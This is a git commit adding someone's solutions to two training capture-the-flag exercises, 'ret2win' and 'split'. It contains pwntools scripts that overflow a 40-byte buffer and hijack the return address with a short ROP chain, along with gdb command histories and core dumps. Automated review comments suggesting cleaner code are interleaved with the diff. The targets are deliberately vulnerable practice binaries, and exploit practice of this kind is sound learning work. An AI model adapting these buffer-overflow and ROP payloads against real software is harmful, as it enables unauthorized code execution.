From ae586f332c3fa2919fca99b0ff8acf1e339b0061 Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Mon, 14 Dec 2020 18:27:06 -0600
Subject: new file: x86_64/ret2win/.gdb_history new file: x86_64/ret2win/core new file: x86_64/ret2win/exploit.py new file: x86_64/split/.gdb_history new file: x86_64/split/core new file: x86_64/split/core.split.25050 new file: x86_64/split/exploit.py new file: x86_64/split/fuckyou new file: x86_64/split/xaa
---
 x86_64/ret2win/.gdb_history | 6 +
 x86_64/ret2win/core | Bin 0 -> 2183168 bytes
 x86_64/ret2win/exploit.py | 13 +++
 x86_64/split/.gdb_history | 256 ++++++++++++++++++++++++++++++++++++++++++
 x86_64/split/core | Bin 0 -> 2183168 bytes
 x86_64/split/core.split.25050 | Bin 0 -> 7067872 bytes
 x86_64/split/exploit.py | 17 +++
 x86_64/split/fuckyou | Bin 0 -> 64 bytes
 x86_64/split/xaa | Bin 0 -> 50 bytes
 9 files changed, 292 insertions(+)
 create mode 100644 x86_64/ret2win/.gdb_history
 create mode 100644 x86_64/ret2win/core
 create mode 100755 x86_64/ret2win/exploit.py
 create mode 100644 x86_64/split/.gdb_history
 create mode 100644 x86_64/split/core
 create mode 100644 x86_64/split/core.split.25050
 create mode 100755 x86_64/split/exploit.py
 create mode 100644 x86_64/split/fuckyou
 create mode 100644 x86_64/split/xaa
diff --git a/x86_64/ret2win/.gdb_history b/x86_64/ret2win/.gdb_history
new file mode 100644
index 0000000..54449f7
--- /dev/null
+++ b/x86_64/ret2win/.gdb_history
@@ -0,0 +1,6 @@
+starti
+context
+nexti
+break main
+continue
+q
diff --git a/x86_64/ret2win/core b/x86_64/ret2win/core
new file mode 100644
index 0000000..4a61a20
Binary files /dev/null and b/x86_64/ret2win/core differ
diff --git a/x86_64/ret2win/exploit.py b/x86_64/ret2win/exploit.py
new file mode 100755
index 0000000..d5506b2
--- /dev/null
+++ b/x86_64/ret2win/exploit.py
@@ -0,0 +1,13 @@
+#!/usr/bin/env python3
+from pwn import *
+
+prog = process('./ret2win')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload += p64(0x0000000000400756)
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
diff --git a/x86_64/split/.gdb_history b/x86_64/split/.gdb_history
new file mode 100644
index 0000000..7bd75aa
--- /dev/null
+++ b/x86_64/split/.gdb_history
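Review bot: `payload += p64(0x0000000000400756)` hard-codes the return target as an unnamed magic number, so nothing tells a reader what it is and the script silently breaks if the binary is rebuilt; resolve it from the ELF, `elf = ELF('./ret2win')` then `payload += p64(elf.symbols['ret2win'])`, or at minimum comment the symbol it points at. The `sleep(1)` followed by a single `prog.recv()` is racy — `recv()` returns only what is buffered at that instant, so the output can be truncated, and `str(..., 'UTF-8')` raises `UnicodeDecodeError` if the target emits non-UTF-8 bytes; `print(prog.recvall(timeout=2).decode(errors='replace'))` is the robust form. `payload += b"\n"` followed by `sendline` sends two newlines, so the explicit one can go. If the target faults on stack alignment inside the called function (a common failure for this style of 64-bit return-to-function, not confirmable from the hunk), prepend a single `ret` gadget to the address. The padding loop is idiomatically `payload = b'a' * 40`.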
@@ -0,0 +1,256 @@
+print (char)usefulString
+print (char&)usefulString
+print (char*)usefulString
+print (char)*usefulString
+print (charusefulString
+print (char)usefulString
+print (char*)usefulString
+print (char)*usefulString
+quit
+exit
+quit
+nexti
+exit
+quit
+exit
+quit
+quit
+exit
+quit
+context
+next
+continue
+context
+quit
+nexti
+continu
+context
+q
+context
+run
+break main
+continue
+context
+nexti
+backtrace
+set exception-debugger on
+continue
+quit
+stepi
+ret
+return
+stepi
+break
+delete
+run
+continue
+clear
+delete
+continue
+clear
+delete
+continue
+delete 0x7f992453fece
+delete 0
+delete 1
+delete 2
+delete 3
+quit
+continue
+context
+q
+context
+q
+quit
+continue
+context
+continue
+q
+q
+break main
+continue
+context
+nexti
+stepi
+quit
+break main
+run
+conitnue
+continue
+context
+stepi
+nexti
+stepi
+return
+stepi
+return
+stepi
+ret
+return
+stepi
+return
+stepi
+stepi
+info breakpoints
+stepi
+return
+stepi
+nexti
+break 0x400706
+break *0x400706
+quit
+continue
+context
+q
+continue
+context
+continue
+quit
+continue
+continue
+quit
+continue
+context
+quit
+continue
+quit
+exit
+quit
+nexti
+continue
+quit
+continue
+quit
+break pwnme
+nexti
+continue
+bexti
+nexti
+quit
+quit
+continue
+quit
+continue
+nexti
+quit
+continue
+q
+continue
+quit
+continue
+[
+quit
+start < fuckyou
+continue
+q
+break *0x0x000000000040074b
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 20
+x/s 0x7fffffffdb2
+quit
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20 + 8
+quit
+quit
+run < fuckyou
+quit
+break *0x000000000040074b
+run < fuckyou
+context
+stepi
+q
+break *0x000000000040074b
+run < fuckyou
+context
+q
+break *0x000000000040074b
+run < fuckyou
+context
+x 0x7fffffffdb20-8
+x 0x7ffff7fad800
+q
+break pwnme
+run < fuckyou
+nexti
+q
+break pwnme
+run
+q
+break pwnme
+run < fuckyou
+context
+nexti
+q
+break pwnme
+run < fuckyou
+nexti
+x/100c 0x7ffff7fad800
+context
+nexti
+quit
+break *0x00000000004007c3
+run < fuckyou
+context
+nexti
+stepi
+q
+break pwnme
+start < fuckyou
+context
+stepi
+return
+context
+break pwnme
+continue
+q
+break pwnme
+run < fuckyou
+context
+nexti
+stepi
+q
+continue
+quit
+continue
+[A
+quit
+q
+info break
+nexti
+break main
+continue
+nexti
+return
+nexti
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+q
+continue
+nexti
+q
+continue
+nexti
+continue
+quit
diff --git a/x86_64/split/core b/x86_64/split/core
new file mode 100644
index 0000000..cf4e312
Binary files /dev/null and b/x86_64/split/core differ
diff --git a/x86_64/split/core.split.25050 b/x86_64/split/core.split.25050
new file mode 100644
index 0000000..6acafe1
Binary files /dev/null and b/x86_64/split/core.split.25050 differ
diff --git a/x86_64/split/exploit.py b/x86_64/split/exploit.py
new file mode 100755
index 0000000..0340b77
--- /dev/null
+++ b/x86_64/split/exploit.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = "./split"
+prog = process('./split')
+payload = b''
+
+for c in range(40): #originally 40
+    payload += b'a'
+
+payload += p64(0x00000000004007c3)
+payload += p64(0x0000000000601060) # usefulString
+payload += p64(0x000000000040074b) # usefulFunction + offset
+
+prog.sendline(payload)
+prog.interactive()
diff --git a/x86_64/split/fuckyou b/x86_64/split/fuckyou
new file mode 100644
index 0000000..d25275b
Binary files /dev/null and b/x86_64/split/fuckyou differ
diff --git a/x86_64/split/xaa b/x86_64/split/xaa
new file mode 100644
index 0000000..f1294fd
Binary files /dev/null and b/x86_64/split/xaa differ
-- 
cgit v1.2.3
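Review bot: `payload += p64(0x00000000004007c3)` is the one chain entry with no comment, and none of the three addresses are derived from the `context.binary` the script already sets, so the chain is tied to one exact build of `split`; with `elf = context.binary`, `p64(elf.symbols['usefulString'])` replaces the second entry and `ROP(elf).find_gadget(['pop rdi', 'ret'])[0]` would both name and locate the first (presumably a `pop rdi; ret` gadget, which the hunk does not show). `# usefulFunction + offset` should say which offset and why, since the gdb history in this commit shows `0x40074b` being found by hand; an expression such as `elf.symbols['usefulFunction'] + N` documents it and survives a relink. `#originally 40` on the loop is a leftover working note; drop it and write the padding as `payload = b'a' * 40`. Separately, the same commit checks in the `core` and `core.split.25050` dumps, which capture the full memory of the debugged process (stack, heap and environment) and have no place in the repository — remove them and add `core*` to `.gitignore`.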